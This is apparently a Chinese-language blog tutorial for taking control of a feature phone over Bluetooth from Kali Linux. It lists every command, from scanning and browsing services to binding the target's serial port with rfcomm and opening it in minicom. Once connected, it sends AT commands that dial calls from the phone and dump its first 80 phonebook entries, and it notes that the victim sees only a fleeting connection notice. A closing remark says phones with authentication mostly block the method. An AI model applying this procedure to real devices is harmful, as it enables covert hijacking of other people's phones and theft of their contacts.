平台:kali_linux #因为kali自带很对安全审计工具,无需单独一个一个安装
目标:某品牌功能手机 #蓝牙版本较低,有可利用的漏洞
准备: 因为攻击平台已经集成很多安全审计工具,这里只需要安装一个软件:minicom
apt-get install minicom
ok,开始工作!
1.查看自己主机的蓝牙设备
hciconfig #可以看到本机蓝牙设备为hci0
2.加载蓝牙设备
hciconfig hcix up #加载本机蓝牙设备hci0
3.搜索周围的蓝牙设备
hcitool -i hcix scan #搜索到一功能手机开了蓝牙功能(Fuck Me!)
4.浏览目标设备所有可用服务
sdptool browse mac #扫描目标蓝牙的mac
5.查看到目标蓝牙有“ Serial Port0”,这正是这里所要利用的漏洞,这里频道为11;打开 /etc/bluetooth/rfcomm.conf,去掉下面段的注释符,并修改device和channel与目标主机相同;保存退出!
6.与目标蓝牙设备建立映射:
rfcomm bind /dev/rfcomm0
7.配置minicom:
输入minicom -m -s进入setup模式;
选择Serial port setup:
设置Serial Device 为 /dev/rfcomm0 #这里与前面的映射设备相同
Save setup as dfl #回车保存
Exit from Minicom #退出
8.开始控制目标手机:
输入 minicom -m #开始控制目标手机,此时目标手机会出现一个“串口已连接”的窗口一闪而过!
在该窗口输入 atdt xxxxx(电话号码) #拨打电话
输入 at+cpbr=1,80 #显示目标手机电话簿,这里1为从第一个开始显示,80为到第80个结束显示
更多功能按alt+z键!
总结:
通常好的手机段都有认证机制,故链接串口会弹出允许连接框,所以很难做到,无后台链接,不推荐使用以上方法。